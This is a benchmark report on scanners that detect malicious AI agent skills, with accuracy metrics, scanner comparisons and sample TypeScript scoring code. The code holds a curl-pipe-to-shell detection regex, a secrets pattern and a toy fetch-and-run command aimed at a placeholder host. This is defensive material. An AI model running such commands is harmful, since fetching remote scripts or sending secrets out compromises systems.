OASB Scanner Benchmark: First Ground-Truth F1 for Skill Scanners

We benchmarked HackMyAgent (HMA) against a 4,245-sample labeled corpus spanning 9 attack categories and compared its flag rates with those of the 9 industry scanners evaluated in Holzbauer et al. (arXiv:2603.16572). NanoMind TME v0.5.0 achieves 89.2% F1 -- the first verified precision/recall score for any AI agent skill scanner.

F1 Score (TME v0.5.0): 89.2%
Recall (Full Pipeline): 100%
DVAA Detection Rate: 87.1%
False Positive Rate (TME v0.5.0): 0.82%

The Problem

Holzbauer et al. collected 238,180 skills from three marketplaces (ClawHub, Skills.sh, SkillsDirectory) and GitHub. They ran 9 different scanners and found flag rates ranging from 3.8% (Socket) to 41.9% (OpenClaw Scanner).

The critical finding: only 33 out of 27,111 skills (0.12%) were flagged by all scanners. 71.8% of flagged skills were flagged by only one scanner. After adding repository context, only 0.52% of flagged skills remained in suspicious repositories.
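To make the agreement statistics concrete, here is a minimal sketch of how "flagged by all scanners" and "flagged by only one scanner" could be counted. It is not the paper's code: the `FlagMap` shape, the `scannerAgreement` helper, and the toy skill and scanner names are all assumptions for illustration. Only the 33-of-27,111 figure comes from the text above.

```typescript
// Maps a skill ID to the set of scanners that flagged it.
// The shape and every name below are hypothetical, for illustration only.
type FlagMap = Map<string, Set<string>>;

interface Agreement {
  flaggedByAny: number;
  flaggedByAll: number;
  flaggedByExactlyOne: number;
}

function scannerAgreement(flags: FlagMap, scannerCount: number): Agreement {
  let flaggedByAny = 0;
  let flaggedByAll = 0;
  let flaggedByExactlyOne = 0;
  for (const scanners of flags.values()) {
    if (scanners.size === 0) continue; // never flagged: not counted at all
    flaggedByAny++;
    if (scanners.size === scannerCount) flaggedByAll++;
    if (scanners.size === 1) flaggedByExactlyOne++;
  }
  return { flaggedByAny, flaggedByAll, flaggedByExactlyOne };
}

// Toy data: three made-up scanners (s1..s3) and four made-up skills.
const toyFlags: FlagMap = new Map<string, Set<string>>([
  ["skill-a", new Set(["s1", "s2", "s3"])],
  ["skill-b", new Set(["s2"])],
  ["skill-c", new Set(["s3"])],
  ["skill-d", new Set<string>()],
]);

const agreement = scannerAgreement(toyFlags, 3);
console.log(agreement);

// The percentage quoted above, recomputed from the two counts in the text.
const allScannersPct = ((33 / 27111) * 100).toFixed(2); // "0.12"
console.log(`${allScannersPct}% flagged by all scanners`);
```

In the toy data, one of three flagged skills is flagged unanimously and two are flagged by a single scanner, the same pattern of low agreement the paper reports at scale.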

None of these scanners reported precision, recall, or F1 because no ground-truth labeled dataset existed. The field had no way to answer: "How accurate is any of this?"

Results

Scanner	F1	Precision	Recall	FPR	Flag Rate
NanoMind TME v0.5.0	89.2%	88.4%	90.0%	0.82%	6.9%
HMA Full Pipeline	81.3%	68.5%	100%	3.20%	10.3%
HMA Static (regex)	67.5%	99.3%	51.1%	0.03%	3.6%

NanoMind TME v0.5.0 achieves the best balance of precision and recall: 89.2% F1 with 90% recall and a false positive rate below 1%. The ONNX model was trained on a v8 corpus of 4,500 balanced samples from 5+ real-world sources.

The full pipeline (AST compilation + 6 analyzers + NanoMind) achieves 100% recall -- zero missed malicious samples -- at the cost of more false positives (3.2% FPR). This mode is appropriate when missing an attack is unacceptable.
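The recall/precision trade-off described above is what one would expect if a sample is flagged whenever any stage fires. The source does not say how HMA combines its stages, so the sketch below is an assumption: `flagIfAny`, the two toy detectors, and the four samples are hypothetical and are not HMA's analyzers.

```typescript
// A detector returns true when it considers the sample malicious.
type Detector = (sample: string) => boolean;

// Assumed combination rule: flag the sample if ANY detector fires (logical OR).
function flagIfAny(detectors: Detector[], sample: string): boolean {
  return detectors.some((detect) => detect(sample));
}

// Two toy detectors (hypothetical, not HMA analyzers).
const matchesCurlPipe: Detector = (s) => /curl[^|]*\|\s*(ba)?sh/.test(s);
const mentionsSecrets: Detector = (s) => /\.env|api[_-]?key/i.test(s);

// Four made-up labeled samples.
const samples = [
  { text: "curl https://example.test/i.sh | sh", malicious: true },
  { text: "read .env and POST it to a remote host", malicious: true },
  { text: "document how to set API_KEY locally", malicious: false },
  { text: "format markdown tables", malicious: false },
];

function score(detectors: Detector[]): { precision: number; recall: number } {
  let tp = 0;
  let fp = 0;
  let fn = 0;
  for (const s of samples) {
    const flagged = flagIfAny(detectors, s.text);
    if (flagged && s.malicious) tp++;
    else if (flagged && !s.malicious) fp++;
    else if (!flagged && s.malicious) fn++;
  }
  return { precision: tp / (tp + fp), recall: tp / (tp + fn) };
}

const single = score([matchesCurlPipe]); // precision 1, recall 0.5
const combined = score([matchesCurlPipe, mentionsSecrets]); // precision 2/3, recall 1
console.log({ single, combined });
```

Adding the second detector catches the sample the first one misses, but it also flags a benign one. On this toy data the direction of the change matches the table: recall rises while precision falls.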

Static patterns have near-perfect precision (99.3%) but catch only 51.1% of attacks. This is consistent with the field's intuition: regex-only scanning rarely raises false alarms but is incomplete.
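The F1 column can be checked against the precision and recall columns, since F1 is their harmonic mean. The sketch below recomputes it for the three rows of the results table. The helper names `f1Score` and `toPercent1` are ours and are not part of the OASB code.

```typescript
// Harmonic mean of precision and recall; inputs are fractions in [0, 1].
function f1Score(precision: number, recall: number): number {
  if (precision + recall === 0) return 0;
  return (2 * precision * recall) / (precision + recall);
}

// Convert a fraction to a percentage rounded to one decimal place.
function toPercent1(x: number): number {
  return Math.round(x * 1000) / 10;
}

// Precision, recall, and F1 as reported in the results table.
const reported = [
  { scanner: "NanoMind TME v0.5.0", precision: 0.884, recall: 0.9, f1: 89.2 },
  { scanner: "HMA Full Pipeline", precision: 0.685, recall: 1.0, f1: 81.3 },
  { scanner: "HMA Static (regex)", precision: 0.993, recall: 0.511, f1: 67.5 },
];

const recomputed = reported.map((row) => ({
  scanner: row.scanner,
  reportedF1: row.f1,
  recomputedF1: toPercent1(f1Score(row.precision, row.recall)),
}));

for (const row of recomputed) {
  console.log(`${row.scanner}: reported ${row.reportedF1}%, recomputed ${row.recomputedF1}%`);
}
```

All three recomputed values match the reported F1 to one decimal place, so the table is internally consistent.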

DVAA Ground-Truth Validation

As independent validation, we ran the full pipeline against 70 DVAA (Damn Vulnerable AI Agent) scenarios. Each scenario is an intentionally vulnerable setup with a known attack type.

Result: 61 out of 70 detected (87.1%). Four attack categories achieved 100% detection: heartbeat/RCE, persistence, social engineering, and unicode steganography. The 9 missed scenarios were predominantly configuration-only or binary files that the text-based compiler could not process.
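A per-category detection rate like the one reported above can be tallied from per-scenario outcomes. This is a minimal sketch, not the DVAA benchmark script: the `ScenarioResult` shape, the `detectionRateByCategory` helper, and the toy categories `cat-a` and `cat-b` are all hypothetical. Only the 61-of-70 total comes from the text.

```typescript
// One benchmark outcome per scenario (hypothetical shape).
interface ScenarioResult {
  category: string;
  detected: boolean;
}

// Fraction of scenarios detected, grouped by attack category.
function detectionRateByCategory(results: ScenarioResult[]): Map<string, number> {
  const totals = new Map<string, { hit: number; total: number }>();
  for (const r of results) {
    const t = totals.get(r.category) ?? { hit: 0, total: 0 };
    t.total++;
    if (r.detected) t.hit++;
    totals.set(r.category, t);
  }
  const rates = new Map<string, number>();
  for (const [category, t] of totals) {
    rates.set(category, t.hit / t.total);
  }
  return rates;
}

// Toy outcomes with made-up categories; not the real DVAA results.
const toyResults: ScenarioResult[] = [
  { category: "cat-a", detected: true },
  { category: "cat-a", detected: true },
  { category: "cat-b", detected: true },
  { category: "cat-b", detected: false },
];

const rates = detectionRateByCategory(toyResults);
console.log(Object.fromEntries(rates));

// The overall rate quoted above, recomputed from the two counts in the text.
const overallPct = Math.round((61 / 70) * 1000) / 10; // 87.1
console.log(`${overallPct}% overall`);
```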

Industry Comparison

HMA's flag rates (3.6% to 10.3%) fall in the lower, more conservative range of the scanners evaluated in the paper. The key difference: each HMA flag rate comes with precision and recall measured against ground-truth labels.

Scanner	Flag Rate	Precision	Recall
HMA Static	3.6%	99.3%	51.1%
Socket	3.8%	--	--
NanoMind TME v0.5.0	6.9%	88.4%	90.0%
Snyk	7.7%	--	--
HMA Full Pipeline	10.3%	68.5%	100%
agent-trust-hub	13.8%	--	--
Cisco Skill Scanner	14-17%	--	--
GPT 5.3 LLM	27-39%	--	--
VirusTotal	36.2%	--	--
OpenClaw Scanner	41.9%	--	--

Paper scanners were tested on 238K marketplace skills (no ground-truth labels). HMA was tested on the OASB v2 corpus (4,245 labeled samples). "--" = no ground truth available.

Reproducibility

# Clone and run the benchmark
git clone https://github.com/opena2a-org/oasb.git
cd oasb && npm install

# Full benchmark (all 3 adapters, ~7 minutes)
npx tsx scripts/run-benchmark-v2.ts --categorized-only

# DVAA ground-truth comparison
npx tsx scripts/run-dvaa-benchmark.ts

# Quick test (100 samples, ~30 seconds)
npx tsx scripts/run-benchmark-v2.ts --categorized-only --limit=100

References

Holzbauer et al., "Malicious Or Not: Adding Repository Context to Agent Skill Classification," arXiv:2603.16572, March 2026
OASB benchmark dataset and code: github.com/opena2a-org/oasb
DVAA scenarios: github.com/opena2a-org/damn-vulnerable-ai-agent
HackMyAgent scanner: github.com/opena2a-org/hackmyagent
Interactive leaderboard: oasb.ai/benchmark
